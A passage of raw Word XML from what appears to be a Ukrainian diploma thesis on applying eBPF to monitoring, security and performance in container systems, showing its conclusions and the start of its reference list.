          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>им</w:t>
      </w:r>
      <w:r w:rsidRPr="00910805">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> для невидимих контейнерів, які важко доступні для стандартних засобів моніторингу, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>та</w:t>
      </w:r>
      <w:r w:rsidRPr="00910805">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> значно покращує виявлення та оперативне реагування на потенційні загрози в таких середовищах.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A5190" w:rsidRPr="00C92BAA" w:rsidRDefault="005A5190" w:rsidP="005A5190">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C92BAA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Достовірність наукових положень, результатів отриманих в дипломній роботі підтверджується коректною постановкою задач.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A5190" w:rsidRDefault="005A5190" w:rsidP="005A5190">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C92BAA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Особистий внесок. Всі дослідження, викладені в дипломній роботі, проведені автором в процесі наукової діяльності. Результати, які виносяться на захист, отримані особисто, запозичений матеріал позначений в роботі посиланнями.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00910805" w:rsidRDefault="00910805" w:rsidP="00910805">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B47E54" w:rsidRDefault="00B47E54" w:rsidP="00910805">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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B47E54" w:rsidRDefault="00B47E54" w:rsidP="00B47E54">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B47E54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ВИСНОВКИ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B47E54" w:rsidRDefault="00B47E54" w:rsidP="00B47E54">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0022205F" w:rsidRPr="003C7FE5" w:rsidRDefault="004C0A51" w:rsidP="0022205F">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>В цілому, необхідно зазначити, що і</w:t>
      </w:r>
      <w:r w:rsidR="0022205F" w:rsidRPr="00742B58">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">нтеграція </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0022205F" w:rsidRPr="00742B58">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0022205F" w:rsidRPr="00742B58">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> в контейнерні системи має значний потенціал для поліпшення моніторингу, безпеки та оптимізації ресурсів. Однак для забезпечення максимального ефекту від його використання важливо ретельно</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> здійснювати</w:t>
      </w:r>
      <w:r w:rsidR="0022205F" w:rsidRPr="00742B58">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> налаштува</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ння</w:t>
      </w:r>
      <w:r w:rsidR="0022205F" w:rsidRPr="00742B58">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> параметр</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ів</w:t>
      </w:r>
      <w:r w:rsidR="0022205F" w:rsidRPr="00742B58">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> та пров</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>одити</w:t>
      </w:r>
      <w:r w:rsidR="0022205F" w:rsidRPr="00742B58">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> комплексну оцінку продуктивності</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> на постійній основі</w:t>
      </w:r>
      <w:r w:rsidR="0022205F" w:rsidRPr="00742B58">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. Оцінка продуктивності повинна враховувати не тільки прямі накладні витрати від роботи </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0022205F" w:rsidRPr="00742B58">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0022205F" w:rsidRPr="00742B58">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>, але й ефективність системи при масштабуванні, наявність потенційних вузьких місць та можливості для подальшої оптимізації.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE1E61" w:rsidRPr="00EE1E61" w:rsidRDefault="00EE1E61" w:rsidP="00EE1E61">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За результатами проведеного</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1E61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> дослідження можна зробити кілька важливих висновків щодо використання </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">розробленого варіанту застосування </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1E61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>технології eBPF для моніторингу та оптимізації продуктивності в контейнерних системах, а також її впливу на безпеку та масштабованість.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE1E61" w:rsidRPr="00EE1E61" w:rsidRDefault="00EE1E61" w:rsidP="00EE1E61">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По перше, т</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1E61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ехнологія eBPF продемонструвала високу ефективність у контексті детального моніторингу роботи контейнерних систем, без значних витрат на збір даних. Вона дозволяє ефективно відстежувати мережевий трафік, системні виклики та взаємодії між контейнерами в реальному часі, що є важливим для точного налаштування продуктивності контейнерів. Однак, незважаючи на її ефективність, важливо ретельно налаштовувати фільтри та збори даних для уникнення зайвих накладних витрат, які можуть вплинути на загальну продуктивність системи.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE1E61" w:rsidRPr="00EE1E61" w:rsidRDefault="00EE1E61" w:rsidP="00EE1E61">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По друге, в</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1E61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">икористання eBPF для посилення безпеки, наприклад, через фільтрацію системних викликів або моніторинг трафіку, може значно збільшити обчислювальні витрати. У середовищах з великою кількістю контейнерів або високою інтенсивністю трафіку, це може призвести до зниження швидкості виконання додатків і </w:t>
      </w:r>
      <w:r w:rsidR="002226F7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>вимагати</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1E61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> додаткових ресурсів для керування доступом або моніторингу трафіку. Тому інтеграція eBPF для безпеки повинна бути збалансована з іншими вимогами щодо продуктивності, аби уникнути значних негативних ефектів.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE1E61" w:rsidRPr="00EE1E61" w:rsidRDefault="002226F7" w:rsidP="00EE1E61">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 xml:space="preserve">Третє. </w:t>
      </w:r>
      <w:r w:rsidR="00EE1E61" w:rsidRPr="00EE1E61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>У великих розподілених середовищах, таких як Kubernetes, масштабованість інтеграції eBPF є одним з найбільш важливих факторів, що визначають ефективність. Використання eBPF для моніторингу або управління на великій кількості контейнерів вимагає ретельного балансування між потужністю обробки даних і навантаженням на хост-систему. Враховуючи високі вимоги до ресурсів при масштабуванні, важливо проводити тестування різних конфігурацій eBPF для пошуку оптимальних параметрів, що дозволя</w:t>
      </w:r>
      <w:r w:rsidR="004C0A51">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>є</w:t>
      </w:r>
      <w:r w:rsidR="00EE1E61" w:rsidRPr="00EE1E61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> досягти бажаної ефективності без надмірного навантаження на систему.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0022205F" w:rsidRPr="00EE1E61" w:rsidRDefault="00EE1E61" w:rsidP="00EE1E61">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EE1E61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Ці результати підкреслюють важливість ретельного налаштування та тестування при використанні eBPF у контейнерних середовищах. Правильне балансування між безпекою, продуктивністю та масштабованістю дозволяє максимально ефективно використовувати цю технологію в реальних умовах.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F14887" w:rsidRDefault="00F14887">
      <w:pP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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00191CBC" w:rsidRDefault="00D30D8A" w:rsidP="00D30D8A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D30D8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>СПИСОК ВИКОРИСТАНИХ ДЖЕРЕЛ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D30D8A" w:rsidRDefault="00D30D8A" w:rsidP="00D30D8A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00191CBC" w:rsidRDefault="00191CBC" w:rsidP="00191CBC">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 Д. Д</w:t>
      </w:r>
      <w:r w:rsidR="00B25B43">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">. Бойко, </w:t>
      </w:r>
      <w:r w:rsidRPr="00191CBC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Застосунок моніторингу трафіку та визнач</w:t>
      </w:r>
      <w:r w:rsidR="00B25B43">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ення DDoS-атак за допомогою eBPF</w:t>
      </w:r>
      <w:r w:rsidRPr="00191CBC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, квал. роб., ЧНУ, 2023 рік. </w:t>
      </w:r>
      <w:r w:rsidR="00B25B43">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>[Електронний ресурс], д</w:t>
      </w:r>
      <w:r w:rsidR="00B25B43" w:rsidRPr="00191CBC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>оступно:</w:t>
      </w:r>
      <w:r w:rsidR="00B25B43">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00191CBC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">https://krs.chmnu.edu.ua/jspui/handle/123456789/2893. Дата звернення: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>листопада. 11, 2024 рік.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00191CBC" w:rsidRDefault="00191CBC" w:rsidP="00191CBC">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2. </w:t>
      </w:r>
      <w:r w:rsidR="00B25B43">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">С. Теслюк, </w:t>
      </w:r>
      <w:r w:rsidRPr="00191CBC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Моніторинг мережевого трафіку та вияв</w:t>
      </w:r>
      <w:r w:rsidR="00B25B43">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>лення атак за допомогою eBPF</w:t>
      </w:r>
      <w:r w:rsidRPr="00191CBC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00B25B43">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Збірник тез конференції</w:t>
      </w:r>
      <w:r w:rsidRPr="00191CBC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, УКУ,</w:t>
      </w:r>
      <w:r w:rsidR="00B25B43">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00191CBC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Львів, 2021. </w:t>
      </w:r>
      <w:r w:rsidR="00B25B43">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>[Електронний ресурс], д</w:t>
      </w:r>
      <w:r w:rsidRPr="00191CBC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">оступно: https://www.er.ucu.edu.ua:8080/handle/1/2877. Дата звернення: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>листопада. 11, 2024 рік.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00191CBC" w:rsidRDefault="00191CBC" w:rsidP="00191CBC">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3. </w:t>
      </w:r>
      <w:r w:rsidR="003E7A2D" w:rsidRPr="003E7A2D">
        <w:rPr>
